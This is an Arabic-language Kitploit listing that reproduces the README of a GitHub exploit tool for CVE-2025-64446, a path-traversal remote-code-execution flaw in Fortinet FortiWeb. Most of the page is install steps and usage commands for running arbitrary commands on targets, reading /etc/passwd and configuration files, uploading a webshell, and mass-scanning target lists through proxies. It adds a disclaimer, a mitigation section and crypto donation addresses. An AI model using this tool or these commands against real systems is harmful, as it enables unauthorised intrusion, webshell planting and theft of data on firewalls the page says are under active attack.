Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-64446-fortiweb-exploit — أداة بحث أمني لاستكشاف واختبار CVE-2025-64446 (ثغرة تنفيذ الأوامر عن بُعد عبر تجاوز المسار في FortiWeb) | Kitploit
أدوات/GitHubGitHub/an5i/cve-2025-64446-fortiweb-exploit
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
an5i/cve-2025-64446-fortiweb-exploit

cve-2025-64446-fortiweb-exploit

أداة بحث أمني لاستكشاف واختبار CVE-2025-64446 (ثغرة تنفيذ الأوامر عن بُعد عبر تجاوز المسار في FortiWeb)

عرض المستودع
111منذ 9 أشهرلم تتم المراجعة بعد

CVE-2025-64446 ثغرة اجتياز المسار في Fortinet FortiWeb واستغلال RCE

أداة بحث أمني للكشف واختبار ثغرة CVE-2025-64446 في جدار حماية تطبيقات الويب FortiWeb من Fortinet. هذه الثغرة الحرجة من نوع zero-day لاجتياز المسار تم استغلالها بنشاط في البرية وتسمح للمهاجمين غير المصادقين بتجاوز الضوابط الأمنية وتنفيذ تعليمات برمجية عشوائية.

⚠️ إخلاء مسؤولية

هذه الأداة مخصصة لاختبارات الأمن المصرح بها والأغراض التعليمية فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. استخدم هذه الأداة فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.

📋 نظرة عامة

CVE-2025-64446 هي ثغرة حرجة من نوع zero-day لاجتياز المسار في جدار حماية تطبيقات الويب FortiWeb من Fortinet، وقد تم استغلالها بنشاط في البرية. تسمح هذه الثغرة للمهاجمين غير المصادقين بتجاوز الضوابط الأمنية من خلال هجمات اجتياز المسار، مما قد يؤدي إلى تنفيذ تعليمات برمجية عن بعد، والوصول إلى ملفات التكوين، والاختراق الكامل للنظام.

CVSS Score: 9.8 (حرج)
الحالة: تم استغلاله بنشاط في البرية
CISA KEV: تمت إضافته إلى كتالوج الثغرات المستغلة المعروفة
التصحيح: FG-IR-25-910
المنتج المتأثر: Fortinet FortiWeb WAF

🔍 الميزات

  • الكشف التلقائي عن FortiWeb: تحديد نشر جدران حماية FortiWeb WAF
  • اختبار اجتياز المسار: اختبار العديد من متغيرات حمولات اجتياز المسار
  • تأكيد الثغرة: التحقق من ثغرة CVE-2025-64446
  • الوصول إلى ملفات التكوين: محاولة قراءة ملفات تكوين FortiWeb
  • نشر webshell: عرض إمكانية تحميل webshell
  • تنفيذ الأوامر: تنفيذ أوامر عشوائية (للاختبار المصرح به)
  • دعم تعدد الخيوط: مسح أهداف متعددة بالتوازي
  • دعم الوكيل (Proxy): تجاوز قيود أمنية إضافية
  • تصدير JSON: نتائج مفصلة بتنسيق JSON
  • برنامج POC مرفق: عرض توضيحي بسيط لإثبات المفهوم

📦 التثبيت

المتطلبات الأساسية

  • Python 3.6 أو أحدث
  • pip (مدير حزم Python)

التثبيت السريع

root@kitploit:~
# Clone the repository
git clone https://github.com/AN5I/cve-2025-64446-fortiweb-exploit.git
cd cve-2025-64446-fortiweb-exploit

# Install dependencies
pip install -r requirements.txt

# Make scripts executable (optional)
chmod +x cve_2025_64446_fortiweb_exploit.py
chmod +x cve_2025_64446_poc.py

بديل: تحميل مباشر

root@kitploit:~
# Download the scripts
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_fortiweb_exploit.py
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_poc.py

# Install dependencies
pip install requests

🚀 الاستخدام

الاستخدام الأساسي

root@kitploit:~
# Single target
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com

# Execute custom command
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -c "whoami"

# Multiple targets from file
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json

# With threading for faster scanning
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -t 5

# Verbose output for debugging
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -v

استخدام الوكيل (Proxy)

root@kitploit:~
# Single proxy
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com --proxy http://proxy:port

# Multiple proxies from file
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt

برنامج POC

root@kitploit:~
# Basic POC test
python3 cve_2025_64446_poc.py -u http://target.com

# Test specific file
python3 cve_2025_64446_poc.py -u http://target.com -f etc/passwd

# Verbose output
python3 cve_2025_64446_poc.py -u http://target.com -v

خيارات سطر الأوامر

root@kitploit:~
-u, --url          عنوان الهدف
-f, --file         ملف يحتوي على عناوين الأهداف (عنوان واحد لكل سطر)
-c, --command      الأمر المراد تنفيذه (الافتراضي: id)
-t, --threads      عدد الخيوط (الافتراضي: 1)
-o, --output       ملف الإخراج (الافتراضي: uknf_fortiweb_results.json)
-v, --verbose      تفعيل التسجيل التفصيلي
--proxy            عنوان الوكيل (مثال: http://127.0.0.1:8080)
--proxy-list       ملف يحتوي على عناوين الوكلاء (عنوان واحد لكل سطر)

📊 المخرجات

ينشئ البرنامج النصي ملف JSON بنتائج مفصلة:

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-21T00:25:40.123456",
  "fortiweb_detected": true,
  "vulnerable": true,
  "path_traversal_successful": true,
  "config_file_read": true,
  "webshell_uploaded": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_payload": "../../../../etc/passwd"
}

🔬 كيف يعمل

  1. مرحلة الكشف: مسح مؤشرات FortiWeb WAF (الرؤوس، المحتوى، صفحات الخطأ)
  2. اختبار الثغرة: اختبار العديد من متغيرات حمولات اجتياز المسار
  3. تأكيد اجتياز المسار: التحقق من نجاح الوصول إلى الملف
  4. الوصول إلى التكوين: محاولة قراءة ملفات تكوين FortiWeb
  5. الاستغلال: إذا كانت الثغرة موجودة، يوضح إمكانية تنفيذ الأوامر عن بعد عبر نشر webshell

🛡️ التخفيف

إذا كنت تستخدم FortiWeb WAF:

  1. تطبيق التحديثات الأمنية فوراً:

    root@kitploit:~
    # Check current version
    show system status
    
    # Update to latest version
    execute upgrade <firmware-file>
    
    • المرجع: FG-IR-25-910
  2. تقسيم الشبكة:

    • تقييد الوصول إلى واجهة إدارة FortiWeb
    • تنفيذ قوائم التحكم في الوصول (ACLs)
    • استخدام VPN للوصول الإداري
  3. تشديد التكوين:

    • تعطيل الميزات غير الضرورية
    • تنفيذ ضوابط وصول صارمة
    • تفعيل التسجيل والمراقبة الشامل
  4. متطلبات CISA:

    • يجب على الوكالات الفيدرالية التصحيح خلال 7 أيام
    • مراقبة كتالوج CISA KEV للحصول على التحديثات

📚 المراجع

  • CVE: CVE-2025-64446
  • Fortinet PSIRT: FG-IR-25-910
  • CISA KEV Catalog: CVE-2025-64446
  • Tenable Blog: تحليل CVE-2025-64446

📖 أمثلة

مثال 1: مسح هدف واحد

root@kitploit:~
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com

مثال 2: أهداف متعددة مع إخراج

root@kitploit:~
# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Run scan
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json

مثال 3: تنفيذ أمر مخصص

root@kitploit:~
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com -c "uname -a"

مثال 4: استخدام الوكلاء

root@kitploit:~
# Single proxy
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com --proxy http://127.0.0.1:8080

# Multiple proxies from file
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt

مثال 5: اختبار POC

root@kitploit:~
# Basic POC
python3 cve_2025_64446_poc.py -u https://example.com

# Test specific file
python3 cve_2025_64446_poc.py -u https://example.com -f etc/passwd

🤝 المساهمة

المساهمات مرحب بها! لا تتردد في تقديم Pull Request.

  1. عمل fork للمستودع
  2. إنشاء فرع الميزة الخاص بك (git checkout -b feature/AmazingFeature)
  3. تنفيذ التغييرات الخاصة بك (git commit -m 'Add some AmazingFeature')
  4. دفع الفرع (git push origin feature/AmazingFeature)
  5. فتح Pull Request

🐛 المشكلات

إذا واجهت أي مشكلات أو لديك اقتراحات، يرجى فتح issue على GitHub.

📝 الرخصة

هذا المشروع مرخص بموجب رخصة MIT - انظر ملف LICENSE للحصول على التفاصيل.

⭐ تاريخ النجوم

إذا وجدت هذه الأداة مفيدة، يرجى التفكير في منحها نجمة على GitHub!

⚖️ القانوني

هذه الأداة مقدمة لأغراض تعليمية واختبارات أمنية مصرح بها فقط. المؤلفون غير مسؤولين عن أي استخدام خاطئ أو ضرر يسببه هذا البرنامج. يتحمل المستخدمون مسؤولية ضمان حصولهم على الإذن المناسب قبل اختبار أي أنظمة.

🙏 الشكر والتقدير

  • مبلغ الثغرة الأصلي والباحثون الأمنيون
  • Fortinet PSIRT للإفصاح عن الثغرة
  • CISA للحفاظ على كتالوج KEV
  • المجتمع الأمني للبحث المستمر

💰 التبرعات

إذا وجدت هذه الأداة مفيدة وترغب في دعم المشروع:

Bitcoin (BTC):

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

Ethereum (ETH):

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

شكراً لدعمكم! 🙏

تنزيل الأداة